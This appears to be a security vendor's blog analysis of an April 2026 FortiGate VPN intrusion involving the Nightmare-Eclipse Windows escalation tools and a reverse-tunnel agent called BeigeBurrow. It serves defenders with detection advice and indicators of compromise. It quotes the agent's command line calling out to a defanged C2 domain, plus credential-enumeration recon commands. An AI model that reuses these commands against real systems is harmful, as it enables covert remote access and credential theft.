Nightmare-Eclipse intrusion analysis

Nightmare-Eclipse Toolkit Deployed 8 Days After Public Release — FortiGate SSL VPN Intrusion Breakdown

Matt Lucas  ·  May 11, 2026  ·  7 min read
Key Findings
8 Days
Public release to active exploitation in the wild
3
PE escalation tools deployed — all failed
CVE-2026-33825
BlueHammer — Windows Defender TOCTOU
3
VPN source countries in credential abuse
Threat Brief

An intrusion through compromised FortiGate SSL VPN credentials led to deployment of three tools from the newly public Nightmare-Eclipse privilege escalation toolkit — BlueHammer, RedSun, and UnDefend — just eight days after the toolkit dropped. All three escalation attempts failed. A previously undocumented Go-based reverse tunnel agent (BeigeBurrow) provided persistent C2 access using yamux session multiplexing over port 443.

When a new exploit toolkit drops publicly, defenders often assume they have weeks to respond. This intrusion erases that assumption. The Nightmare-Eclipse collection — three Windows privilege escalation tools targeting Windows Defender — was released April 2, 2026. By April 10, components were live in a real environment. Eight days is now the realistic pre-exploitation window for defenders when exploit code goes public.

1 Initial Access: Stolen FortiGate Credentials

Microsoft security update page for CVE-2026-33825
Figure 1 — CVE-2026-33825 Microsoft security update published April 2, 2026 — eight days before deployment in this intrusion Via Huntress

The threat actor entered through FortiGate SSL VPN using compromised credentials — not an unpatched VPN vulnerability. The authentication pattern is what gives it away: logins originating from Russia, Singapore, and Switzerland within a tight timeframe, inconsistent with any single user's travel. Multi-geography credential abuse like this is standard for actors who purchase or harvest credential sets and rotate them through geographically diverse proxies to complicate IP-based blocking.

Detection Opportunity

Multi-geography VPN logins within hours of each other — particularly from high-risk regions — should trigger an immediate review. Most organizations have the log data; the gap is thresholds set too broadly or not at all.

2 Post-Exploitation Activity

Detected payload executions timeline
Figure 2 — Payload Execution Timeline Detected payload executions across the intrusion window, April 10–16 Via Huntress

The timeline shows rapid escalation: first malicious binary execution April 10, with the privilege escalation campaign running through April 16 as each tool failed and the next was attempted. Three separate PE tools deployed in sequence suggests the actor had a toolkit ready but no single reliable path — they were trying options until something worked.

whoami /priv spawned from M365Copilot process
Figure 3 — Recon via M365Copilot Parent whoami /priv spawned from Microsoft365Copilot.exe — attacker leveraged the Office process for initial recon commands Via Huntress

A notable OPSEC observation: the actor used whoami /priv, cmdkey /list, and net group in sequence from a suspicious parent process (M365Copilot.exe). Credential enumeration via cmdkey /list as an early recon step indicates the actor was specifically looking for stored RDP credentials — a common pivot vector that doesn't require additional exploitation.

3 Attack Chain

Intrusion Progression — April 2–16, 2026
1
Credential Compromise → FortiGate SSL VPN login from 78.29.48[.]29 (RU), 212.232.23[.]69 (SG), 179.43.140[.]214 (CH)
2
BlueHammer (CVE-2026-33825) → Deployed as FunnyApp.exe from user's Pictures folder. TOCTOU race on Windows Defender to extract SAM credentials. Failed
3
RedSun → Oplocks + directory junctions for arbitrary System32 writes via TieringEngineService.exe. Requires precise timing to win the race. Failed
4
UnDefend → Exclusive locks on Defender signature files to disable AV. Terminated by SOC during active response. Failed
5
BeigeBurrow C2 → Go-compiled reverse tunnel connecting to staybud.dpdns[.]org:443 via yamux multiplexing. Persistent operator access. Active

4 BeigeBurrow: Undocumented Reverse Tunnel Agent

BeigeBurrow command-line flags
Figure 4 — BeigeBurrow Command-Line Interface Available flags including -server, -hide, and -chain for multi-hop tunnel chaining Via Huntress

BeigeBurrow is a previously undocumented Go-compiled binary that establishes a persistent reverse tunnel using HashiCorp's yamux session multiplexing protocol. The observed execution:

agent.exe -server staybud.dpdns[.]org:443 -hide

The -hide flag suppresses the console window. A -chain flag supports daisy-chaining through multiple hops, though it wasn't used here. The agent connects outbound on TCP 443 and enters an infinite reconnect loop with a five-minute retry interval.

BeigeBurrow binary entry point decompiled
Figure 5 — BeigeBurrow Entry Point (Decompiled) Decompiled Go entry point showing flag parsing, tunnel configuration, and reconnect loop logic Via Huntress
yamux session multiplexing configuration in BeigeBurrow
Figure 6 — yamux Session Configuration HashiCorp yamux multiplexing config — each logical stream carries a target address, allowing pivot to arbitrary internal hosts over a single TCP connection Via Huntress

Once connected, BeigeBurrow creates a yamux session accepting multiple logical streams over the single TCP connection. Each stream carries target address and port information, allowing the operator to pivot to arbitrary internal hosts without spawning additional external connections. Multiplexed streams over port 443 are effectively invisible to perimeter firewall rules.

Attacker Skill Assessment

The actor ran undef.exe -h (the tool has no help flag) and used the misspelled argument -agressive instead of -aggressive. These are commodity operator tells — capable enough to gain access and attempt post-exploitation, but relying on borrowed tooling they hadn't thoroughly tested.

5 Indicators of Compromise

IndicatorTypeDescription
78.29.48[.]29IPSSL VPN source — Russian Federation
212.232.23[.]69IPSSL VPN source — Singapore
179.43.140[.]214IPSSL VPN source — Switzerland
staybud.dpdns[.]orgDomainBeigeBurrow C2 (port 443)
a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7cSHA-256BeigeBurrow agent binary
FunnyApp.exeFilenameBlueHammer (user Pictures folder)
RedSun.exeFilenameRedSun PE tool (Downloads folder)
undef.exe, z.exeFilenameUnDefend + companion (Downloads\ks\, Downloads\kk\)
agent.exe -server ... -hideCommandBeigeBurrow execution pattern
Exploit:Win32/DfndrPEBluHmr.BZAV SigWindows Defender detection for BlueHammer

6 Recommended Actions

Concerned about your VPN and endpoint exposure?

RedEye Security provides threat assessments for organizations that need to understand their real risk before an incident occurs.

Talk to us
Primary Source
This analysis references original research and incident reporting published by Huntress. The screenshots and figures above are reproduced from their report for educational purposes. Full technical details and raw telemetry are available in the Huntress report.
View Huntress Report →